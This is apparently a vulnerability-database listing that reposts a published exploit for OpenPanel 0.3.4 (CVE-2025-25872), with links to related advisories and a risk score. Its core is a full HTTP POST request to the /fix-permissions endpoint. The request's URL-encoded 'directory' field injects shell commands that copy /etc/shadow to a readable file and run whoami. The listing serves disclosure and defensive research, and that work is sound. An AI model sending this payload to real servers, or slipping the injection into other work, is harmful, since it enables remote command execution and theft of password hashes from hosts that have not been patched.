OpenPanel 0.3.4 Remote Code Execution

🗓️ 05 Mar 2025 00:00:00Reported by Punthat Siriwan, Korn Chaisuwan, Pongtorn AngsuchotmeteeType

packetstorm🔗 packetstorm.news👁 302 Views

OpenPanel 0.3.4 vulnerability allows remote code execution via fix permissions exploit.

Reporter	Title	Published	Views	Family All 10
0day.today	OpenPanel 0.3.4 Remote Code Execution Vulnerability	6 Mar 202500:00	–	zdt
Circl	CVE-2025-25872	6 Mar 202520:00	–	circl
CNNVD	OpenPanel 安全漏洞	5 Mar 202500:00	–	cnnvd
CVE	CVE-2025-25872	14 Mar 202500:00	–	cve
Cvelist	CVE-2025-25872	14 Mar 202500:00	–	cvelist
EUVD	EUVD-2025-6440	3 Oct 202520:07	–	euvd
NVD	CVE-2025-25872	14 Mar 202516:15	–	nvd
OSV	CVE-2025-25872	14 Mar 202516:15	–	osv
RedhatCVE	CVE-2025-25872	16 Mar 202500:23	–	redhatcve
Vulnrichment	CVE-2025-25872	14 Mar 202500:00	–	vulnrichment

# Exploit Title: OpenPanel 0.3.4 - Remote Code Execution via Fix Permission
    # Date: Nov 7, 2024
    # Exploit Author: Punthat Siriwan, Korn Chaisuwan, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2025-25872
    
    POST /fix-permissions HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyOFQ.ilfMmYNxLNnGlJ8NtQ5-25YRLQ0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/fix-permissions
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 146
    Origin: https://demo.openpanel.org:2083
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    
    directory=%2Fhome%2Fstefan%2F%3B%20cat%20%2Fetc%2Fshadow%20%3E%20%2Fhome%2Fstefan%2Fshadow.txt%3B%20whoami%20%3E%20%2Fhome%2Fstefan%2Frce_test.txt

05 Mar 2025 00:00Current

8.3High risk

Vulners AI Score8.3

EPSS0.00182